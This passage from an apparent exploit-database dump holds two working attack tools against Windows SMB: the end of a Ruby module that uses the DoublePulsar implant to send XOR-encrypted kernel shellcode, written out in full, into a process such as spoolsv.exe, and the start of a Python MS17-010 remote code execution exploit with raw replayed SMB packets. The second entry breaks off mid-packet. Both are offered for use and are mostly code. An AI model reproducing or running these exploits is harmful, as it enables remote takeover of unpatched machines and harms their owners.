'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack('V').first\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n vprint_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n vprint_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n vprint_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/33313", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-03-19T02:05:14", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "zdt", "title": "Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-05-10T00:00:00", "id": "1337DAY-ID-27752", "href": "https://0day.today/exploit/description/27752", "sourceData": "# Exploit Author: Juan Sacco\r\n# MS17-010 - https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\r\n# Tested on: Microsoft Windows Server 2008 x64 SP1 R2 Standard \r\n#\r\n# Description: SMBv1 SrvOs2FeaToNt OOB is prone to a remote code execution\r\n# vulnerability because the application fails to perform adequate\r\n# boundary-checks on user-supplied input. Srv.sys process SrvOs2FeaListSizeToNt \r\n# and when the logic is not correct it leads to a cross-border copy. The vulnerability trigger point is as follows:\r\n#\r\n# Vulnerable code:\r\n# unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2)\r\n# {\r\n# int v4; // [email\u00a0protected]\r\n# _BYTE *v5; // [email\u00a0protected]\r\n# unsigned int result; // [email\u00a0protected]\r\n# \r\n# v4 = a1 + 8;\r\n# *(_BYTE *)(a1 + 4) = *(_BYTE *)a2;\r\n# *(_BYTE *)(a1 + 5) = *(_BYTE *)(a2 + 1);\r\n# *(_WORD *)(a1 + 6) = *(_WORD *)(a2 + 2);\r\n# _memmove((void *)(a1 + 8), (const void *)(a2 + 4), *(_BYTE *)(a2 + 1));\r\n# v5 = (_BYTE *)(*(_BYTE *)(a1 + 5) + v4);\r\n# *v5++ = 0;\r\n# _memmove(v5, (const void *)(a2 + 5 + *(_BYTE *)(a1 + 5)), *(_WORD *)(a1 + 6));\r\n# result = (unsigned int)&v5[*(_WORD *)(a1 + 6) + 3] & 0xFFFFFFFC;\r\n# *(_DWORD *)a1 = result - a1;\r\n# return result;\r\n# }\r\n#\r\n# Impact: An attacker could exploit this vulnerability to execute arbitrary code in the\r\n# context of the application. Failed exploit attempts could result in a\r\n# denial-of-service condition.\r\n#\r\n# Timeline:\r\n# 04/05/2017 - Research started\r\n# 04/05/2017 - First PoC using original code\r\n# 05/05/2017 - Kernel debugging on Windows 2008\r\n# 05/05/2017 - Exploit code first draft\r\n# 06/05/2017 - Functional PoC\r\n# 07/05/2017 - Added support for Zerosum0x0 shellcode\r\n# 08/05/2017 - Code revisited and bugs fixed\r\n# 09/05/2017 - First successful shell\r\n# 09/05/2017 - Exploit tested in QA Laba\r\n# 09/05/2017 - Exploit code final review\r\n# 09/05/2017 - Publish\r\n#\r\n# Vendor homepage: http://www.microsoft.com\r\n# This exploit is a port from the amazing work made by Risksense. Checkout the original project at: https://github.com/RiskSense-Ops/MS17-010\r\n# Credits: @EquationGroup @ShadowBrokers @progmboy @zerosum0x0 @juansacco \r\n#\r\n# How to run: python3 ms17010.py ipaddress\r\n#\r\nimport sys\r\nimport socket\r\nimport time\r\nimport ast\r\nimport binascii\r\nimport os\r\n \r\ndef mod_replay():\r\n datfile = [\"('connect', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00\\\\x88\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\r\\\\xff\\\\x00\\\\x88\\\\x00\\\\x04\\\\x11\\\\n\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xd4\\\\x00\\\\x00\\\\x00K\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00W\\\\x00i\\\\x00n\\\\x00d\\\\x00o\\\\x00w\\\\x00s\\\\x00 \\\\x002\\\\x000\\\\x000\\\\x000\\\\x00 \\\\x002\\\\x001\\\\x009\\\\x005\\\\x00\\\\x00\\\\x00W\\\\x00i\\\\x00n\\\\x00d\\\\x00o\\\\x00w\\\\x00s\\\\x00 \\\\x002\\\\x000\\\\x000\\\\x000\\\\x00 \\\\x005\\\\x00.\\\\x000\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 1, 'userid', 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00X\\\\xffSMBu\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x04\\\\xff\\\\x00X\\\\x00\\\\x08\\\\x00\\\\x01\\\\x00-\\\\x00\\\\x00\\\\\\\\\\\\x00\\\\\\\\\\\\x001\\\\x007\\\\x002\\\\x00.\\\\x001\\\\x006\\\\x00.\\\\x009\\\\x009\\\\x00.\\\\x005\\\\x00\\\\\\\\\\\\x00I\\\\x00P\\\\x00C\\\\x00$\\\\x00\\\\x00\\\\x00?????\\\\x00', 0.0)\", \"('recv', 1, 'treeid', 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x048\\\\xffSMB\\\\xa0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x14\\\\x01\\\\x00\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00\\\\xd0\\\\x03\\\\x01\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00K\\\\x00\\\\x00\\\\x00\\\\xd0\\\\x03\\\\x00\\\\x00h\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\xec\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x0